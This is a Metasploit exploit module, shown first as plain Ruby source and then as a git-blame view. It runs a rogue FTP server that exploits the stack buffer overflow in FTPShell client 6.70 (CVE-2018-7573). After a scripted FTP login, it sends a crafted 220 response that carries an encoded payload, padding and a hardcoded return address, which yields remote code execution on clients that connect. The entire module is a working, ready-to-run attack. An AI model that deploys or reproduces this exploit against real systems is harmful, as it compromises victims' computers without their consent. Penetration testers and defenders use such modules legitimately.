modules/exploits/windows/ftp/ftpshell_cli_bof.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::TcpServer

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise
          edition) allowing remote code execution.
        },
        'Author' => [
          'r4wd3r', # Original exploit author
          'Daniel Teixeira' # MSF module author
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2018-7573'],
          [ 'EDB', '44596' ]
        ],
        'Payload' => {
          'Space' => 400,
          'BadChars' => "\x00\x22\x0d\x0a\x0b"
        },
        'Platform' => 'win',
        'Targets' => [
          # CALL ESI in FTPShell.exe : 0x00452eed
          [ 'Windows Universal', { 'Ret' => "\xed\x2e\x45" } ]
        ],
        'Privileged' => false,
        'DefaultOptions' => {
          'SRVHOST' => '0.0.0.0',
          'EXITFUNC' => 'thread'
        },
        'DisclosureDate' => '2017-03-04',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options [ OptPort.new('SRVPORT', [ true, 'The FTP port to listen on', 21 ]) ]
  end

  def exploit
    srv_ip_for_client = datastore['SRVHOST']
    if srv_ip_for_client == '0.0.0.0'
      if datastore['LHOST']
        srv_ip_for_client = datastore['LHOST']
      else
        srv_ip_for_client = Rex::Socket.source_address('50.50.50.50')
      end
    end

    srv_port = datastore['SRVPORT']

    print_status("Please ask your target(s) to connect to #{srv_ip_for_client}:#{srv_port}")
    super
  end

  def on_client_connect(client)
    p = regenerate_payload(client)
    return if p.nil?

    print_status("#{client.peerhost} - connected.")

    res = client.get_once.to_s.strip
    print_status("#{client.peerhost} - Request: #{res}") unless res.empty?
    print_status("#{client.peerhost} - Response: Sending 220 Welcome")
    welcome = "220 Welcome.\r\n"
    client.put(welcome)

    res = client.get_once.to_s.strip
    print_status("#{client.peerhost} - Request: #{res}")
    print_status("#{client.peerhost} - Response: sending 331 OK")
    user = "331 OK.\r\n"
    client.put(user)

    res = client.get_once.to_s.strip
    print_status("#{client.peerhost} - Request: #{res}")
    print_status("#{client.peerhost} - Response: Sending 230 OK")
    pass = "230 OK.\r\n"
    client.put(pass)
    res = client.get_once.to_s.strip
    print_status("#{client.peerhost} - Request: #{res}")

    sploit = '220 "'
    sploit << payload.encoded
    sploit << "\x20" * (payload_space - payload.encoded.length)
    sploit << target.ret
    sploit << "\" is current directory\r\n"

    print_status("#{client.peerhost} - Request: Sending the malicious response")
    client.put(sploit)
  end
end
FTPShell client 6.70 (Enterprise edition) 2018-06-27 16:37:22 +01:00			`##`
			`# This module requires Metasploit: https://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`class MetasploitModule < Msf::Exploit::Remote`
			`Rank = NormalRanking`

			`include Msf::Exploit::Remote::TcpServer`

			`def initialize(info = {})`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`super(`
			`update_info(`
			`info,`
			`'Name' => 'FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow',`
			`'Description' => %q{`
Update ftpshell_cli_bof.rb 2018-06-28 12:55:48 +01:00			`This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise`
			`edition) allowing remote code execution.`
FTPShell client 6.70 (Enterprise edition) 2018-06-27 16:37:22 +01:00			`},`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Author' => [`
			`'r4wd3r', # Original exploit author`
			`'Daniel Teixeira' # MSF module author`
FTPShell client 6.70 (Enterprise edition) 2018-06-27 16:37:22 +01:00			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'License' => MSF_LICENSE,`
			`'References' => [`
Update ftpshell_cli_bof.rb 2018-06-27 16:42:29 +01:00			`[ 'CVE', '2018-7573'],`
FTPShell client 6.70 (Enterprise edition) 2018-06-27 16:37:22 +01:00			`[ 'EDB', '44596' ]`
			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Payload' => {`
			`'Space' => 400,`
FTPShell client 6.70 (Enterprise edition) 2018-06-27 16:37:22 +01:00			`'BadChars' => "\x00\x22\x0d\x0a\x0b"`
			`},`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Platform' => 'win',`
			`'Targets' => [`
FTPShell client 6.70 (Enterprise edition) 2018-06-27 16:37:22 +01:00			`# CALL ESI in FTPShell.exe : 0x00452eed`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`[ 'Windows Universal', { 'Ret' => "\xed\x2e\x45" } ]`
FTPShell client 6.70 (Enterprise edition) 2018-06-27 16:37:22 +01:00			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Privileged' => false,`
			`'DefaultOptions' => {`
FTPShell client 6.70 (Enterprise edition) 2018-06-27 16:37:22 +01:00			`'SRVHOST' => '0.0.0.0',`
			`'EXITFUNC' => 'thread'`
			`},`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'DisclosureDate' => '2017-03-04',`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`'DefaultTarget' => 0,`
			`'Notes' => {`
Update info -d markdown 2025-06-23 12:43:46 +01:00			`'Reliability' => UNKNOWN_RELIABILITY,`
			`'Stability' => UNKNOWN_STABILITY,`
			`'SideEffects' => UNKNOWN_SIDE_EFFECTS`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`}`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`)`
			`)`
FTPShell client 6.70 (Enterprise edition) 2018-06-27 16:37:22 +01:00
Update ftpshell_cli_bof.rb 2018-06-28 12:55:48 +01:00			`register_options [ OptPort.new('SRVPORT', [ true, 'The FTP port to listen on', 21 ]) ]`
FTPShell client 6.70 (Enterprise edition) 2018-06-27 16:37:22 +01:00			`end`

			`def exploit`
			`srv_ip_for_client = datastore['SRVHOST']`
			`if srv_ip_for_client == '0.0.0.0'`
			`if datastore['LHOST']`
			`srv_ip_for_client = datastore['LHOST']`
			`else`
			`srv_ip_for_client = Rex::Socket.source_address('50.50.50.50')`
			`end`
			`end`

			`srv_port = datastore['SRVPORT']`

			`print_status("Please ask your target(s) to connect to #{srv_ip_for_client}:#{srv_port}")`
			`super`
			`end`

			`def on_client_connect(client)`
Update ftpshell_cli_bof.rb 2018-06-29 14:22:40 +01:00			`p = regenerate_payload(client)`
			`return if p.nil?`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00
FTPShell client 6.70 (Enterprise edition) 2018-06-27 16:37:22 +01:00			`print_status("#{client.peerhost} - connected.")`

			`res = client.get_once.to_s.strip`
			`print_status("#{client.peerhost} - Request: #{res}") unless res.empty?`
			`print_status("#{client.peerhost} - Response: Sending 220 Welcome")`
			`welcome = "220 Welcome.\r\n"`
			`client.put(welcome)`

			`res = client.get_once.to_s.strip`
			`print_status("#{client.peerhost} - Request: #{res}")`
			`print_status("#{client.peerhost} - Response: sending 331 OK")`
			`user = "331 OK.\r\n"`
			`client.put(user)`

			`res = client.get_once.to_s.strip`
			`print_status("#{client.peerhost} - Request: #{res}")`
			`print_status("#{client.peerhost} - Response: Sending 230 OK")`
			`pass = "230 OK.\r\n"`
			`client.put(pass)`
			`res = client.get_once.to_s.strip`
			`print_status("#{client.peerhost} - Request: #{res}")`

Update ftpshell_cli_bof.rb 2018-06-28 12:55:48 +01:00			`sploit = '220 "'`
Update ftpshell_cli_bof.rb 2018-06-27 16:42:29 +01:00			`sploit << payload.encoded`
Update ftpshell_cli_bof.rb 2018-06-29 14:22:40 +01:00			`sploit << "\x20" * (payload_space - payload.encoded.length)`
FTPShell client 6.70 (Enterprise edition) 2018-06-27 16:37:22 +01:00			`sploit << target.ret`
Update ftpshell_cli_bof.rb 2018-06-29 14:22:40 +01:00			`sploit << "\" is current directory\r\n"`
FTPShell client 6.70 (Enterprise edition) 2018-06-27 16:37:22 +01:00
			`print_status("#{client.peerhost} - Request: Sending the malicious response")`
			`client.put(sploit)`
			`end`
			`end`